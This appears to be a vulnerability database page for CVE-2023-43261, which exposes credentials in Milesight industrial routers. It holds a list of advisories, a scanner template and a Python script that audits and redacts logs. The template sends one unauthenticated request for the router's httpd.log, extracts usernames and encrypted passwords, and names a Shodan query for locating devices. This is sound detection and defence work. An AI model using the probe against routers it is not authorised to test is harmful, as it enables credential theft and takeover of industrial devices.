| Title | Published | Views | Family |
|---|---|---|---|
| Milesight UR5X / UR32L / UR32 / UR35 / UR41 Credential Leakage Exploit | 5 Feb 2024 00:00 | – | zdt |
| The vulnerability of Milesight UR5X, UR32L, UR32, UR35, and UR41 router microprogramming systems lies in the insufficient protection of service data, allowing attackers to gain unauthorized access to protected information. | 11 Oct 2023 00:00 | – | bdu_fstec |
| CVE-2023-43261 | 2 Oct 2023 10:59 | – | circl |
| Milesight Log Information Disclosure Vulnerability | 4 Oct 2023 00:00 | – | cnnvd |
| CVE-2023-43261 | 4 Oct 2023 00:00 | – | cve |
| CVE-2023-43261 | 4 Oct 2023 00:00 | – | cvelist |
| Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption | 5 Feb 2024 00:00 | – | exploitdb |
| Exploit for Insertion of Sensitive Information into Log File in Milesight Ur5X_Firmware | 28 Sep 2023 08:45 | – | githubexploit |
| CVE-2023-43261 | 4 Oct 2023 12:15 | – | nvd |
| CVE-2023-43261 | 4 Oct 2023 12:15 | – | osv |

```yaml
id: CVE-2023-43261

info:
  name: Milesight Routers - Information Disclosure
  author: gy741
  severity: high
  description: |
    A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.
  impact: |
    Unauthenticated attackers can access publicly exposed log files containing encrypted admin and user passwords, then decrypt them using the hardcoded AES key found in JavaScript code, gaining full administrative access to industrial cellular routers.
  remediation: |
    Update Milesight Industrial Cellular Router firmware to disable directory listing, restrict access to log files, and remove hardcoded cryptographic keys from the web interface.
  reference:
    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
    - https://github.com/win3zz/CVE-2023-43261
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261
    - http://milesight.com
    - http://ur5x.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-43261
    cwe-id: CWE-532
    epss-score: 0.60113
    epss-percentile: 0.99021
    cpe: cpe:2.3:h:milesight:ur51:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: milesight
    product: ur51
    shodan-query: http.html:rt_title
  tags: cve2023,cve,router,milesight,disclosure,unauth,iot,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/lang/log/httpd.log"

    max-size: 5000
    extractors:
      - type: regex
        regex:
          - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"'
# digest: 490a00463044022001093e226903ec0808971f776fa550a1c422e1f660c651c41f7285d03dced8210220692844c6e2b8104759a1cd9fe68370922a24d8777defd82b5d09ae1a79f30365:922c64590222798bb761d5b6d8e72950
```
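
A defender-side audit for the CWE-532 condition described above, as an added example that is not part of the template or of any Milesight code: it applies the extractor's pattern to a log you already hold and scrubs password fields before the log is stored or shared. The log layout and sample values are constructed placeholders, and `TEMPLATE_RE`, `ANY_PASSWORD_RE`, `find_leaks`, `redact` and `audit` are hypothetical names. It also shows that the extractor pattern only matches `=`-padded base64, so scrubbing should use a broader pattern than the scanner signature.

```python
import re

# Pattern taken from the template's extractor, with a named group added
# around the password value. It only matches '='-padded base64.
TEMPLATE_RE = re.compile(
    r'"username":"(?P<user>[^"]+)","password":"'
    r'(?P<pw>(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=))"'
)
# Broader scrubbing pattern (assumption: any quoted password value is sensitive).
ANY_PASSWORD_RE = re.compile(r'("password":")[^"]*(")')

# Constructed sample lines: the surrounding log layout is an assumption and
# the values are placeholders, not real ciphertext.
SAMPLE_LOG = "\n".join([
    '[01/Jan/2024 10:00:01] POST /cgi {"username":"admin","password":"QUJDREVGR0hJSktMTU5PUA=="}',
    '[01/Jan/2024 10:00:05] GET /index.html 200',
    '[01/Jan/2024 10:02:13] POST /cgi {"username":"operator","password":"QUJDREVGR0hJSktMTU5PUFFS"}',
])


def find_leaks(log_text):
    """Return (line_no, username) for every entry the template pattern flags."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        for m in TEMPLATE_RE.finditer(line):
            hits.append((no, m.group("user")))
    return hits


def redact(log_text):
    """Replace every logged password value, padded or not, with a marker."""
    return ANY_PASSWORD_RE.sub(r'\1[REDACTED]\2', log_text)


def audit(log_text):
    """Summarise exposure before and after scrubbing."""
    scrubbed = redact(log_text)
    return {
        "flagged_by_template": find_leaks(log_text),
        "password_fields": len(ANY_PASSWORD_RE.findall(log_text)),
        "flagged_after_redaction": find_leaks(scrubbed),
        "scrubbed": scrubbed,
    }


if __name__ == "__main__":
    report = audit(SAMPLE_LOG)
    print(report["flagged_by_template"], report["password_fields"])
    print(report["scrubbed"])
```

A gap between `password_fields` and the number of `flagged_by_template` entries means the log holds credential values the scanner signature does not report.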